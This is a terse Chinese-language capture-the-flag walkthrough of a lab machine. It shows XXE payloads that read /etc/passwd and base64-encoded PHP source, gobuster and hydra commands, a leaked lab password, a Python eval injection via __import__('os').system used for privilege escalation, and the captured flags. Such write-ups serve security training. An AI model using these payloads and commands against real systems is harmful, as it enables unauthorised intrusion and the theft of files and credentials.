开放端口
访问
burp抓包
猜测存在XML注入
测试
<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "1111">]>
<bugreport>
<title>&example;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
存在xml
构造payload读取 /etc/passwd文件
<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'file:///etc/passwd'>]>
<bugreport>
<title>&example;</title>
<cwe>2</cwe>
<cvss>3</cvss>
<reward>4</reward>
</bugreport>
gobuster对网站目录进行爆破:
gobuster dir -u http://10.129.224.126 -w /usr/share/dirb/wordlists/big.txt -x php -o file.txt
python构造exp
对data数据进行改造
PD94bWwgdmVyc2lvbj0iMS4wIj8%2bPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M%2bMzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ%2bDQogICAgICAgIDwvYnVncmVwb3J0Pg%3d%3d
PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0+DQogICAgICAgIDxidWdyZXBvcnQ+DQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M+MzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ+DQogICAgICAgIDwvYnVncmVwb3J0Pg==
注 对特殊符号进行url解码(%2b + ; %3d =)
exp1:
对其中想要的内容进行匹配
exp2:
成功获取到想要的内容
要获取php文件的内容,可以通过
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=index.php'>]>
将文件内容先进行base64编码后传输出来
exp3:
成功获得php文件内容
修改为更加方便的exp
exp4:
成功执行
gobuster爆破结果
查看 db.php
出现账号密码
admin/m19RoAU0hP41A1sTsq6K
查看portal.php
查看 log_submit.php
对 /etc/passwd 文件查看用户
存在 root,development用户
尝试密码喷洒
hydra -L uname.txt -p m19RoAU0hP41A1sTsq6K 10.129.224.126 ssh
ssh登录靶机
成功登录,但只有普通用户权限
获取普通用户flag
b1f5888fae3e5af4800a5dc9b67fbe70
查看授权的命令列表
查看 /opt/skytrain_inc/ticketValidator.py
对代码进行分析
根据要求构造票据
# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144
使用授权命令进行测试
成功
尝试执行命令
# Skytrain Inc
## Ticket to a b c d
__Ticket Code:__
**144+__import__("os").system("id")
成功执行 id 命令
尝试获取flag
成功获取flag
51223cf305c258ae69c4e20c45920c1b
尝试提权
提权成功
参考视频:https://www.youtube.com/watch?v=5axsDhumfhU&ab_channel=IppSec